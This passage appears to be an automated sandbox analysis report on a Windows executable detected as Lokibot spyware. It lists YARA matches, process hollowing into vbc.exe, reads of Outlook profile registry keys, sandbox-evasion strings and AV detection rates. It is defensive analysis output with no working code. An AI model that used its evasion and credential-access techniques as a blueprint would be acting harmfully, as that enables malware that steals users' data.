          Source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeCode function: 1_2_00007FFC08DD30B11_2_00007FFC08DD30B1
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeCode function: 1_2_00007FFC08DD02501_2_00007FFC08DD0250
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeCode function: 1_2_00007FFC08DD35AA1_2_00007FFC08DD35AA
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeCode function: 1_2_00007FFC08DD58F1 NtUnmapViewOfSection,1_2_00007FFC08DD58F1
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.277880213.0000000001239000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.277988455.00000000014B0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameYYb0Ep2I7EwTtTvva.exe4 vs FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameadderalldll.dll8 vs FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeStatic PE information: Section: .reloc ZLIB complexity 1.021484375
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeVirustotal: Detection: 63%
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMetadefender: Detection: 54%
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeReversingLabs: Detection: 75%
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeFile read: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeJump to behavior
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe "C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe"
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@4/2
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMutant created: \Sessions\1\BaseNamedObjects\NULL
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

          Data Obfuscation:

          barindex
          Yara detected aPLib compressed binaryShow sources
          Source: Yara matchFile source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.1326c458.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.3148ed0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe PID: 6996, type: MEMORYSTR
          .NET source code contains potential unpackerShow sources
          Source: 1.2.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.d70000.0.unpack, _.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe.d70000.0.unpack, _.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeCode function: 1_2_00007FFC08DD0F31 push eax; retf 1_2_00007FFC08DD0F32
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmpBinary or memory string: ASWHOOKX
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmpBinary or memory string: ASWHOOKA
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe TID: 7084Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe TID: 7152Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe, 00000001.00000002.278048512.0000000002EA0000.00000004.00020000.sdmpBinary or memory string: uBFFvKFzltaAsyykWAFWeOKaApmuqNPlSbQdICqyklKKDYRGRbTabhJKzJiMMfLRJgWIVsmZaLinubJQEgkVcxVanRXdbfWMtdXMvMCiEhlepfUmRDiHDBCkMYSTtjcdALlFAJZIVRW
          Source: vbc.exe, 00000004.00000002.291153375.00000000007D8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
